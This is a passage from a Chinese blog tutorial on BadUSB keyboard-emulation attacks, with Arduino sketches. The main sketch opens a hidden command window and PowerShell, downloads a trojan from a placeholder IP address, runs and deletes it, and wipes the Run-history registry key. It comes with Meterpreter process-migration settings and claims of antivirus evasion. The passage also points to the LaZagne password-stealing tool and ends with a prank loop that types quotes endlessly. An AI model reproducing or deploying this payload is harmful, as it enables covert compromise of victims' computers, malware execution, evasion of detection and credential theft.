HID攻击之Badusb(全面的带你了解Badusb五种的花样玩法.)

文章出自JoCat QQ：1506610991 有渗透测试需求及商务合作请联系JoCatWFY@163.com

本文可能存在攻击性，请勿用于非法用途。仅用于技术交流，一切责任与本人无关，如有不足的地方希望指点

作者博客JoCatW.github.io

Question3：badusb运行完毕没有删除木马，转移进程啊

Answer：我们可以在代码的最后添加删除木马的指令。并且，在我们监听的时候加上自动转移进程的模块

所以我们首先要在监听的时候加上自动转移进程的操作
set autorunscript migrate -N explorer.exe
或
set autorunscript -f
第一个是指定迁移到哪个进程，第二个默认迁移到notepad（记事本）

修改我们的Aurduino badusb代码，利用del命令删除文件

所以程序如下.

#include <Keyboard.h>  
void setup() {  
Keyboard.begin();//开始键盘通讯  
delay(10000);//延时单位是ms，做测试可以调长一点方便你利用这个时间来下载程序.不然你会哭的.测试完后就可以改为1000ms了  
Keyboard.press(KEY_LEFT_GUI);//按下win键  
delay(200);//延时200ms,这里的所有延时都要根据实际情况来讲，太短有可能使程序运行失败   
Keyboard.press('r');//按下r键     
delay(700);//延时700ms    
Keyboard.release(KEY_LEFT_GUI);//松开win键   
Keyboard.release('r');//松开r键    
Keyboard.press(KEY_CAPS_LOCK);//按下大写键    
Keyboard.release(KEY_CAPS_LOCK);//松开大写键    
delay(600);//延时700ms    
Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");//输入创建最小的CMD的程序  
delay(500);//延时500ms   
Keyboard.press(KEY_RETURN);//按下回车    
Keyboard.release(KEY_RETURN);//松开回车  
delay(300);//延时300ms  
Keyboard.println("powershell");//输入Powershell进入powershell  
delay(300);//延时300ms  
Keyboard.press(KEY_RETURN);//按下回车    
Keyboard.release(KEY_RETURN);//松开回车  
delay(700);//延时700ms   
Keyboard.press(KEY_CAPS_LOCK);//按下大写键    
Keyboard.release(KEY_CAPS_LOCK);//松开大写键  
delay(700);//延时700ms  
Keyboard.println("powershell (new-object System.Net.WebClient).DownloadFile( 'xxx.xxx.xxx.xxx\1.exe','D:\\1.exe')");   
//上面这条语句是利用powershell下载木马的语句，按照我的标注来就行了，1.exe是你自己木马的名字  
Keyboard.press(KEY_RETURN);//按下回车  
Keyboard.release(KEY_RETURN);//松开回车  
Keyboard.println("START D:\\1.exe");//执行你下载的文件  
delay(300);//延时300ms  
Keyboard.press(KEY_RETURN);//按下回车   
Keyboard.release(KEY_RETURN);//松开回车  
delay(200);//延时200ms  
Keyboard.println("DEL D:\\1.exe");//删除你下载的文件  
Keyboard.press(KEY_RETURN);//按下回车   
Keyboard.release(KEY_RETURN);//松开回车  
delay(200);//延时200ms  
Keyboard.println("exit");//模拟输入exit来退出Powershell    
delay(200);//延时200ms   
Keyboard.press(KEY_RETURN);//按下回车
delay(300);//延时300ms
Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); //利用注册表清除开始--运行的记录（打扫战场）
delay(300);//延时300ms  
Keyboard.press(KEY_RETURN);//按下回车   
Keyboard.release(KEY_RETURN);//松开回车  
delay(200);//延时200ms
Keyboard.println("exit");//模拟输入exit来退出CMD    
delay(200);//延时200ms   
Keyboard.press(KEY_RETURN);//按下回车    
Keyboard.release(KEY_RETURN);//松开回车    
delay(200);//延时200ms    
Keyboard.end();//结束键盘通讯   
}
 
void loop()//循环  
{  
}

然后我们烧录代码即可.

到这我们的终极版badusb也终于制作完成了，成功的实现了免杀，插上去自动转移进程，隐藏窗口的效果，而剩下的速度上的优化，就看各位小伙伴们自己的啦.

00x9 badusb盗取用户信息

在上面我们是通过植入木马来对于靶机进行控制，而在实际操作中有时是为了获取数据.
在这里我们可以使用LaZagne，一款强大的密码抓取工具，浏览器记住的密码相当于明文存储在硬盘上。用户名密码这些深层的密码。理论上，都可以被提取出来。
而这边这种方法我就不再赘述了

具体的内容可以看j0的文章https://blog.csdn.net/ qq_26091745/article/details/98092211

还有github上一位大佬的文章https://www.cdxy.me/?p=549

00x10 badusb自动打招呼机（复读机）

这边其实就算是一个娱乐的玩法
主要玩法就是让badusb不断模拟人输入指定语句并发送
也可以制作复读机，通过鼠标的移动复制来实现效果.
而我做这个的原因更多是告诫那些祖安嘴臭人，你们在网上到处乱喷时，也可能只是与一块小小的单片机对喷，就你那点实力，还是喷不过单片机的.哈哈.
甚至你还可以用这个来播放精神小伙语录，和名言大全
简直很必备啊，有木有.

代码如下.

#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯
delay(10000);//延时单位是ms，做测试可以调长一点方便你利用这个时间来下载程序.不然你会哭的.测试完后就可以改为1000ms了
}

void loop()//循环
{
 Keyboard.begin();//开始键盘通讯
 delay(800);//延时200ms
 Keyboard.println("Hello");//输入指定内容
 Keyboard.press(KEY_RETURN);//按下回车   
 Keyboard.release(KEY_RETURN);//松开回车  
 delay(800);//延时200ms
 Keyboard.println("Start");//输入指定内容
 Keyboard.press(KEY_RETURN);//按下回车   
 Keyboard.release(KEY_RETURN);//松开回车  
 delay(800);//延时200ms  
 Keyboard.println("No learning, no learning, no benefit to anybody at any time.");//输入指定内容
 Keyboard.press(KEY_RETURN);//按下回车   
 Keyboard.release(KEY_RETURN);//松开回车  
 delay(800);//延时200ms
 Keyboard.println("If a man works only for himself, he may become a famous scholar, a brilliant intellectual, but he can never be a real perfect man.");//输入指定内容
 Keyboard.press(KEY_RETURN);//按下回车   
 Keyboard.release(KEY_RETURN);//松开回车  
 delay(800);//延时200ms
 Keyboard.println("Virtue, virtue peculiar to women, but harm themselves, their gentle and submissive asexual, actually make them of bondage and suffering.");//输入指定内容
 Keyboard.press(KEY_RETURN);//按下回车   
 Keyboard.release(KEY_RETURN);//松开回车  
 delay(800);//延时200ms
 Keyboard.println("Violence Is the Old Society's Mid-wife That Helps Conceive Every New Society.");//输入指定内容
 Keyboard.press(KEY_RETURN);//按下回车   
 Keyboard.release(KEY_RETURN);//松开回车  
 delay(800);//延时200ms
 Keyboard.println("as soon as man learns to walk he also learns to fall, and only through falling does he learn to walk.");//输入指定内容
 Keyboard.press(KEY_RETURN);//按下回车   
 Keyboard.release(KEY_RETURN);//松开回车  
 delay(800);//延时200ms
 Keyboard.println("Sincere, very sensible life of friendship is priceless.");//输入指定内容
 Keyboard.press(KEY_RETURN);//按下回车   
 Keyboard.release(KEY_RETURN);//松开回车  
 delay(800);//延时200ms
 Keyboard.println("Friendship, like the morning fog, like purity, flattery does not get it, friendship can only be faithful to consolidate.");//输入指定内容
 Keyboard.press(KEY_RETURN);//按下回车   
 Keyboard.release(KEY_RETURN);//松开回车  
 delay(800);//延时200ms
 Keyboard.println("There is no plane route in science, only the one person who crawls along the cragged could reach to the bright top, not be fear of hardship. ");//输入指定内容
 Keyboard.press(KEY_RETURN);//按下回车   
 Keyboard.release(KEY_RETURN);//松开回车  
 delay(800);//延时200ms
 Keyboard.println("There is no plane route in science, only the one person who crawls along the cragged could reach to the bright top, not be fear of hardship. ");//输入指定内容
 Keyboard.press(KEY_RETURN);//按下回车   
 Keyboard.release(KEY_RETURN);//松开回车  
 delay(800);//延时200ms
}